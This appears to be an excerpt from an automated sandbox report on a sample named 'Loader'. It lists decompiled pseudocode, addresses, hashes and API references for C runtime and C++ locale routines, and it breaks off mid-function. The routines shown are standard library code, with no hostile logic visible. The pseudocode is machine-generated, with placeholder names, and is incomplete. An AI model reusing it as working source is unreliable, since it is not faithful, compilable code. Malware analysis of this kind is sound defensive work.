Instruction ID: e1b002294a6932d22f087d34fea0a43bc4ee9d9da82d786a7e61a2a0c5df0b72
Opcode Fuzzy Hash: 5036abe44c5e7d6689b9f42fd783a28adf5c816815361cf6474e17ea3bb55a1a
Instruction Fuzzy Hash: EDD19C71900249AFDB11DFB9C881BAEBBF5FF08300F144569F599AB282E771AD45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00AFDF64 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AFDF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xb36bf0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00AF4AEF(_t46);
							E00AFD210( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00AF4AEF(_t47);
							E00AFD6C4( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00AF4AEF( *((intOrPtr*)(_t74 + 0x7c)));
						E00AF4AEF( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00AF4AEF( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00AF4AEF( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00AF4AEF( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00AF4AEF( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00AFE0D5( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xb36de8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00AF4AEF(_t31);
							E00AF4AEF( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00AF4AEF(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00AF4AEF(_t74);
			}

0x00afdf6c
0x00afdf70
0x00afdf78
0x00afdf81
0x00afdf86
0x00afdf8d
0x00afdf95
0x00afdf9d
0x00afdfa8
0x00afdfae
0x00afdfaf
0x00afdfb7
0x00afdfbf
0x00afdfca
0x00afdfd0
0x00afdfd4
0x00afdfdf
0x00afdfe5
0x00afdf86
0x00afdfe6
0x00afdfee
0x00afe001
0x00afe014
0x00afe022
0x00afe02d
0x00afe032
0x00afe03b
0x00afe043
0x00afe044
0x00afe04a
0x00afe04d
0x00afe050
0x00afe057
0x00afe059
0x00afe05d
0x00afe065
0x00afe06c
0x00afe072
0x00afe073
0x00afe073
0x00afe07a
0x00afe07c
0x00afe081
0x00afe089
0x00afe08e
0x00afe08f
0x00afe08f
0x00afe092
0x00afe095
0x00afe098
0x00afe09b
0x00afe09b
0x00afe0ab

APIs

___free_lconv_mon.LIBCMT ref: 00AFDFA8

Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD22D
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD23F
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD251
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD263
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD275
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD287
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD299
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD2AB
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD2BD
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD2CF
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD2E1
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD2F3
Part of subcall function 00AFD210: _free.LIBCMT ref: 00AFD305

_free.LIBCMT ref: 00AFDF9D

Part of subcall function 00AF4AEF: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?), ref: 00AF4B05
Part of subcall function 00AF4AEF: GetLastError.KERNEL32(?,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?,?), ref: 00AF4B17

_free.LIBCMT ref: 00AFDFBF
_free.LIBCMT ref: 00AFDFD4
_free.LIBCMT ref: 00AFDFDF
_free.LIBCMT ref: 00AFE001
_free.LIBCMT ref: 00AFE014
_free.LIBCMT ref: 00AFE022
_free.LIBCMT ref: 00AFE02D
_free.LIBCMT ref: 00AFE065
_free.LIBCMT ref: 00AFE06C
_free.LIBCMT ref: 00AFE089
_free.LIBCMT ref: 00AFE0A1

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8561be5f5abe1d4acba4688d74f8d66c84c55dd531b96f8e3313e5e871aac9dc
Instruction ID: 1862a89931a86e7c1eaec21558ea35f219e8378469b3716db1c2dc73ccd81d85
Opcode Fuzzy Hash: 8561be5f5abe1d4acba4688d74f8d66c84c55dd531b96f8e3313e5e871aac9dc
Instruction Fuzzy Hash: 85315C32644209AFEB21EBB9D945B7BB3E9EF04390F104829F259D71A1EE71ED40CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00AE1700 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00AE1700(void* __ebx) {
				void* __edi;
				void* __esi;
				signed int _t61;
				signed int _t68;
				intOrPtr* _t73;
				signed int _t74;
				intOrPtr _t86;
				short _t87;
				char _t89;
				char _t90;
				void* _t91;
				signed int _t96;
				signed int _t97;
				signed char _t99;
				signed int _t101;
				intOrPtr _t106;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				void* _t117;
				intOrPtr* _t119;
				signed int _t121;
				signed int _t123;
				void* _t124;
				intOrPtr* _t129;
				signed int _t131;
				signed int _t132;
				signed int _t134;
				intOrPtr _t137;
				signed int _t140;
				intOrPtr _t141;
				void* _t143;
				void* _t144;
				void* _t146;
				void* _t147;
				void* _t151;

				_t144 = _t143 - 0x94;
				_push(__ebx);
				_t99 = 0;
				 *((intOrPtr*)(_t144 + 0x14)) = 0;
				E00AE708B(_t144 + 0x10, 0);
				_t121 =  *0xb37aac; // 0x3
				_t137 =  *0xb37ab8; // 0x7d44e0
				if(_t121 == 0) {
					E00AE708B(_t144 + 0x18, _t121);
					_t151 =  *0xb37aac - _t99; // 0x3
					if(_t151 == 0) {
						_t96 =  *0xb37b88; // 0x3
						_t97 = _t96 + 1;
						 *0xb37b88 = _t97;
						 *0xb37aac = _t97;
					}
					E00AE70E3(_t144 + 0x14);
					_t121 =  *0xb37aac; // 0x3
				}
				_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xa8)) + 4));
				if(_t121 >=  *((intOrPtr*)(_t106 + 0xc))) {
					_t129 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t129 =  *((intOrPtr*)( *((intOrPtr*)(_t106 + 8)) + _t121 * 4));
					if(_t129 != 0) {
						L27:
						E00AE70E3(_t144 + 0x10);
						return _t129;
					} else {
						L8:
						if( *((intOrPtr*)(_t106 + 0x14)) == _t99) {
							L11:
							if(_t129 != 0) {
								goto L27;
							} else {
								goto L12;
							}
						} else {
							_t91 = E00AE7402();
							if(_t121 >=  *((intOrPtr*)(_t91 + 0xc))) {
								L12:
								if(_t137 == 0) {
									_push(0x18);
									_t131 = E00AE903D(__eflags);
									_t146 = _t144 + 4;
									__eflags = _t131;
									if(_t131 == 0) {
										_t129 = 0;
										__eflags = 0;
										goto L24;
									} else {
										_t110 =  *( *((intOrPtr*)(_t146 + 0xa8)) + 4);
										__eflags = _t110;
										if(_t110 == 0) {
											_t61 = 0xb0525c;
										} else {
											_t61 =  *(_t110 + 0x18);
											__eflags = _t61;
											if(_t61 == 0) {
												_t61 = _t110 + 0x1c;
											}
										}
										_push(_t61);
										_t111 = _t146 + 0x1c;
										E00AE19B0(_t99, _t111);
										 *(_t131 + 4) = _t99;
										 *_t131 = 0xb06314;
										E00AEE7B8(_t117);
										E00AE7786(__eflags, _t146 + 0x4c);
										 *(_t131 + 8) = _t99;
										 *(_t131 + 0x10) = _t99;
										 *(_t131 + 0x14) = _t99;
										E00AE7786(__eflags, _t146 + 0x7c);
										_push(1);
										_push(1);
										_t68 = E00AED2E6();
										_t147 = _t146 + 0x10;
										__eflags = _t68;
										if(__eflags == 0) {
											E00AE71F5(__eflags);
											goto L29;
										} else {
											_push(1);
											_push(6);
											 *_t68 = _t99;
											 *(_t131 + 8) = _t68;
											_t111 = E00AED2E6();
											_t147 = _t147 + 8;
											__eflags = _t111;
											if(__eflags == 0) {
												L29:
												E00AE71F5(__eflags);
												goto L30;
											} else {
												_t86 =  *((intOrPtr*)("false")); // 0x736c6166
												 *_t111 = _t86;
												_t87 =  *0xb052dc; // 0x65
												_push(1);
												_push(5);
												 *((short*)(_t111 + 4)) = _t87;
												 *(_t131 + 0x10) = _t111;
												_t111 = E00AED2E6();
												_t147 = _t147 + 8;
												__eflags = _t111;
												if(__eflags == 0) {
													L30:
													E00AE71F5(__eflags);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t99);
													_t101 =  *(_t147 + 8);
													_push(_t121);
													_t123 = _t111;
													 *_t123 = 0;
													 *(_t123 + 0x10) = 0;
													 *((intOrPtr*)(_t123 + 0x14)) = 0xf;
													__eflags = _t101 - 0xf;
													if(_t101 > 0xf) {
														__eflags = _t101 - 0x7fffffff;
														if(__eflags > 0) {
															E00AE42A0(_t101, _t117, __eflags);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_t119 =  *((intOrPtr*)(_t147 + 4));
															_t73 = _t119;
															_push(_t131);
															_t132 = _t111;
															_push(_t123);
															_t50 = _t73 + 1; // 0x1
															_t124 = _t50;
															 *_t132 = 0;
															 *(_t132 + 0x10) = 0;
															 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
															do {
																_t112 =  *_t73;
																_t73 = _t73 + 1;
																__eflags = _t112;
															} while (_t112 != 0);
															_t74 = _t73 - _t124;
															__eflags = _t74;
															_push(_t74);
															_push(_t119);
															E00AE4660(_t132, _t119);
															return _t132;
														} else {
															_push(_t137);
															_t140 = _t101 | 0x0000000f;
															_push(_t131);
															__eflags = _t140 - 0x7fffffff;
															if(_t140 <= 0x7fffffff) {
																__eflags = _t140 - 0x16;
																_t141 =  <  ? 0x16 : _t140;
															} else {
																_t141 = 0x7fffffff;
															}
															_push(_t141 + 1);
															_t134 = E00AE42C0(_t101, _t117);
															 *(_t123 + 0x10) = _t101;
															 *((intOrPtr*)(_t123 + 0x14)) = _t141;
															E00AEA8E0(_t123, _t134,  *((char*)(_t147 + 0x18)), _t101);
															 *((char*)(_t134 + _t101)) = 0;
															 *_t123 = _t134;
															return _t123;
														}
													} else {
														 *(_t123 + 0x10) = _t101;
														E00AEA8E0(_t123, _t123,  *((char*)(_t147 + 0x10)), _t101);
														 *((char*)(_t101 + _t123)) = 0;
														return _t123;
													}
												} else {
													_t89 = "true"; // 0x65757274
													_t99 = 1;
													 *_t111 = _t89;
													_t90 =  *0xb052e4; // 0x0
													 *((char*)(_t111 + 4)) = _t90;
													 *(_t131 + 0x14) = _t111;
													 *((short*)(_t131 + 0xc)) = 0x2c2e;
													L24:
													__eflags = _t99 & 0x00000001;
													if(__eflags != 0) {
														E00AE2EC0(_t146 + 0x18, _t129);
													}
													E00AE73D6(__eflags, _t129);
													_t144 = _t146 + 4;
													 *((intOrPtr*)( *_t129 + 4))();
													 *0xb37ab8 = _t129;
													goto L27;
												}
											}
										}
									}
								} else {
									_t129 = _t137;
									goto L27;
								}
							} else {
								_t129 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8)) + _t121 * 4));
								goto L11;
							}
						}
					}
				}
			}

0x00ae1700
0x00ae1706
0x00ae170a
0x00ae1711
0x00ae1715
0x00ae171a
0x00ae1720
0x00ae1728
0x00ae172f
0x00ae1734
0x00ae173a
0x00ae173c
0x00ae1741
0x00ae1742
0x00ae1747
0x00ae1747
0x00ae1750
0x00ae1755
0x00ae1755
0x00ae1762
0x00ae1768
0x00ae177a
0x00ae177a
0x00000000
0x00ae176a
0x00ae176d
0x00ae1772
0x00ae18a6
0x00ae18aa
0x00ae18bb
0x00ae1778
0x00ae177c
0x00ae177f
0x00ae1791
0x00ae1793
0x00000000
0x00000000
0x00000000
0x00000000
0x00ae1781
0x00ae1781
0x00ae1789
0x00ae1799
0x00ae179b
0x00ae17a4
0x00ae17ab
0x00ae17ad
0x00ae17b0
0x00ae17b2
0x00ae1880
0x00ae1880
0x00000000
0x00ae17b8
0x00ae17bf
0x00ae17c2
0x00ae17c4
0x00ae17d2
0x00ae17c6
0x00ae17c6
0x00ae17c9
0x00ae17cb
0x00ae17cd
0x00ae17cd
0x00ae17cb
0x00ae17d7
0x00ae17d8
0x00ae17dc
0x00ae17e1
0x00ae17e4
0x00ae17ea
0x00ae17f4
0x00ae17fd
0x00ae1801
0x00ae1804
0x00ae1807
0x00ae180c
0x00ae180e
0x00ae1810
0x00ae1815
0x00ae1818
0x00ae181a
0x00ae18bc
0x00000000
0x00ae1820
0x00ae1820
0x00ae1822
0x00ae1824
0x00ae1826
0x00ae182e
0x00ae1830
0x00ae1833
0x00ae1835
0x00ae18c1
0x00ae18c1
0x00000000
0x00ae183b
0x00ae183b
0x00ae1840
0x00ae1842
0x00ae1848
0x00ae184a
0x00ae184c
0x00ae1850
0x00ae1858
0x00ae185a
0x00ae185d
0x00ae185f
0x00ae18c6
0x00ae18c6
0x00ae18cb
0x00ae18cc
0x00ae18cd
0x00ae18ce
0x00ae18cf
0x00ae18d0
0x00ae18d1
0x00ae18d5
0x00ae18d6
0x00ae18d8
0x00ae18de
0x00ae18e5
0x00ae18ec
0x00ae18ef
0x00ae190f
0x00ae1915
0x00ae1967
0x00ae196c
0x00ae196d
0x00ae196e
0x00ae196f
0x00ae1970
0x00ae1974
0x00ae1976
0x00ae1977
0x00ae1979
0x00ae197a
0x00ae197a
0x00ae197d
0x00ae1983
0x00ae198a
0x00ae1991
0x00ae1991
0x00ae1993
0x00ae1994
0x00ae1994
0x00ae1998
0x00ae1998
0x00ae199c
0x00ae199d
0x00ae199e
0x00ae19a7
0x00ae1917
0x00ae1917
0x00ae191a
0x00ae191d
0x00ae191e
0x00ae1924
0x00ae1932
0x00ae1934
0x00ae1926
0x00ae1926
0x00ae1926
0x00ae193a
0x00ae1945
0x00ae194a
0x00ae194d
0x00ae1950
0x00ae1958
0x00ae195c
0x00ae1964
0x00ae1964
0x00ae18f1
0x00ae18f9
0x00ae18fc
0x00ae1904
0x00ae190c
0x00ae190c
0x00ae1861
0x00ae1861
0x00ae1866
0x00ae186b
0x00ae186d
0x00ae1872
0x00ae1875
0x00ae1878
0x00ae1882
0x00ae1882
0x00ae1885
0x00ae188b
0x00ae188b
0x00ae1891
0x00ae1898
0x00ae189d
0x00ae18a0
0x00000000
0x00ae18a0
0x00ae185f
0x00ae1835
0x00ae181a
0x00ae179d
0x00ae179d
0x00000000
0x00ae179d
0x00ae178b
0x00ae178e
0x00000000
0x00ae178e
0x00ae1789
0x00ae177f
0x00ae1772

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AE1715
std::_Lockit::_Lockit.LIBCPMT ref: 00AE172F
std::_Lockit::~_Lockit.LIBCPMT ref: 00AE1750
std::_Facet_Register.LIBCPMT ref: 00AE1891
std::_Lockit::~_Lockit.LIBCPMT ref: 00AE18AA
Concurrency::cancel_current_task.LIBCPMT ref: 00AE18BC
Concurrency::cancel_current_task.LIBCPMT ref: 00AE18C1
Concurrency::cancel_current_task.LIBCPMT ref: 00AE18C6

Strings

true, xrefs: 00AE1861
false, xrefs: 00AE183B
D}, xrefs: 00AE1720, 00AE18A0

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
String ID: false$true$D}
API String ID: 3742692055-1112164632
Opcode ID: 5505bbf113991085b3ab2bc91832aa2634a1f01e89fd765f0071d06de2e221f5
Instruction ID: ee16f3a8eb42b42cfb4a880234bdae51edc998208345464b4c6d57f570952051
Opcode Fuzzy Hash: 5505bbf113991085b3ab2bc91832aa2634a1f01e89fd765f0071d06de2e221f5
Instruction Fuzzy Hash: 2F5114716083908FD734EF66D981A6FBBE4AF04700F14486DE9458B752EB31ED46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00AFD30E Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00AFD30E(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E00AF4A92(1, 0x50);
					_v8 = _t235;
					E00AF4AEF(0);
					if(_t235 != 0) {
						_t228 = E00AF4A92(1, 4);
						_v12 = _t228;
						E00AF4AEF(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0xb36bf0, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E00AF4A92(1, 4);
							_v16 = _t233;
							E00AF4AEF(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E00AF75CA(_t225);
								_t118 = E00AF75CA(_t225,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t122 = E00AF75CA(_t225,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t126 = E00AF75CA(_t225,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t130 = E00AF75CA(_t225,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t134 = E00AF75CA(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t138 = E00AF75CA(_t225);
								_t142 = E00AF75CA(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t146 = E00AF75CA(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t150 = E00AF75CA(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t154 = E00AF75CA(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t158 = E00AF75CA(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t162 = E00AF75CA(_t225);
								_t166 = E00AF75CA(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t170 = E00AF75CA(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t174 = E00AF75CA(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t178 = E00AF75CA(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t182 = E00AF75CA(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t186 = E00AF75CA(_t225);
								_t190 = E00AF75CA(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((E00AF75CA(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E00AFD210(_v8);
								E00AF4AEF(_v8);
								E00AF4AEF(_v12);
								E00AF4AEF(_v16);
								goto L4;
							}
							E00AF4AEF(_t235);
							E00AF4AEF(_v12);
							L7:
							goto L4;
						}
						E00AF4AEF(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0xb36bf0;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E00AF4AEF( *(_t209 + 0x88));
							E00AF4AEF( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x00afd30e
0x00afd317
0x00afd31e
0x00afd321
0x00afd324
0x00afd32d
0x00afd34f
0x00afd353
0x00afd356
0x00afd360
0x00afd373
0x00afd377
0x00afd37a
0x00afd384
0x00afd396
0x00afd628
0x00afd629
0x00afd62b
0x00afd633
0x00afd637
0x00afd63c
0x00afd647
0x00afd653
0x00afd65f
0x00afd66b
0x00afd671
0x00afd675
0x00afd677
0x00afd677
0x00000000
0x00afd675
0x00afd3a5
0x00afd3a9
0x00afd3ac
0x00afd3b6
0x00afd3ca
0x00afd3d0
0x00afd3dd
0x00afd3f4
0x00afd40b
0x00afd422
0x00afd432
0x00afd43f
0x00afd456
0x00afd46d
0x00afd484
0x00afd49e
0x00afd4b5
0x00afd4cc
0x00afd4e3
0x00afd4fd
0x00afd514
0x00afd52b
0x00afd542
0x00afd55c
0x00afd573
0x00afd580
0x00afd581
0x00afd583
0x00afd58a
0x00afd5a1
0x00afd5c5
0x00afd5f3
0x00afd602
0x00afd602
0x00afd606
0x00000000
0x00000000
0x00afd5f7
0x00afd5f7
0x00afd5fd
0x00afd60c
0x00afd601
0x00afd601
0x00000000
0x00afd601
0x00afd60e
0x00afd610
0x00afd610
0x00afd613
0x00afd615
0x00afd618
0x00000000
0x00afd61c
0x00afd5ff
0x00000000
0x00afd5ff
0x00000000
0x00afd608
0x00afd5cb
0x00afd5d1
0x00afd5da
0x00afd5e3
0x00000000
0x00afd5e8
0x00afd3b9
0x00afd3c2
0x00afd38c
0x00000000
0x00afd38c
0x00afd387
0x00000000
0x00afd387
0x00afd362
0x00000000
0x00afd337
0x00afd337
0x00afd339
0x00afd33c
0x00afd679
0x00afd679
0x00afd681
0x00afd683
0x00afd683
0x00afd68b
0x00afd690
0x00afd694
0x00afd69c
0x00afd6a4
0x00afd6aa
0x00afd694
0x00afd6ae
0x00afd6b3
0x00afd6b9
0x00000000
0x00afd6b9

APIs

_free.LIBCMT ref: 00AFD356
_free.LIBCMT ref: 00AFD37A
_free.LIBCMT ref: 00AFD387
_free.LIBCMT ref: 00AFD3AC
_free.LIBCMT ref: 00AFD3B9
_free.LIBCMT ref: 00AFD3C2
_free.LIBCMT ref: 00AFD69C
_free.LIBCMT ref: 00AFD6A4

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6a34ba8ef2121e7cc3141a3ead94a3bc21c2c2ac9b92d51124b4275aee6135af
Instruction ID: 52bb45733285b5447e726f70209d5e7bb0a06630873ff8c18df814a75977547b
Opcode Fuzzy Hash: 6a34ba8ef2121e7cc3141a3ead94a3bc21c2c2ac9b92d51124b4275aee6135af
Instruction Fuzzy Hash: 73C13376E44209ABDB20DBE8DD42FEEB7F9AB08740F144565FB44EB282E6709D408764

Uniqueness

Uniqueness Score: -1.00%

Function 00AF9906 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00AF9906(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E00AEF208(__eflags);
